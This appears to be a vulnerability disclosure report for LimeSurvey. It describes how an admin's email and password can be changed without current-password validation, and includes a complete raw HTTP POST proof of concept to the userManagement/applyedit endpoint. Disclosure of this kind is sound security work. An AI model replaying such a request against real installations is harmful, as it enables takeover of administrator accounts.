Description

Able to change admin email and password without current password validation.

Change the User%5Buid%5D for the User UID of the current admin user. for the example: uid of the current admin is 1. Then change the other info like User%5Bemail%5D,User%5Bpassword%5D and password_repeat for changing it.

Proof of Concept

POST /limesurvey/index.php/userManagement/applyedit HTTP/1.1
Host: localhost
Content-Length: 381
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/limesurvey/index.php/userManagement/index
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: <COOKIE>
Connection: close

YII_CSRF_TOKEN=<YII_CSRF_TOKEN>&User%5Buid%5D=1&User%5Bfull_name%5D=admin&User%5Bemail%5D=admin@amdin.com&expires=30.04.2023+14%3A49&User%5Bpassword%5D=Str0ngpass1337&password_repeat=Str0ngpass1337&YII_CSRF_TOKEN=<YII_CSRF_TOKEN>

Impact

This allow the attacker user to change the password and email of the admin if they forgot to logout or lock their computer in public places.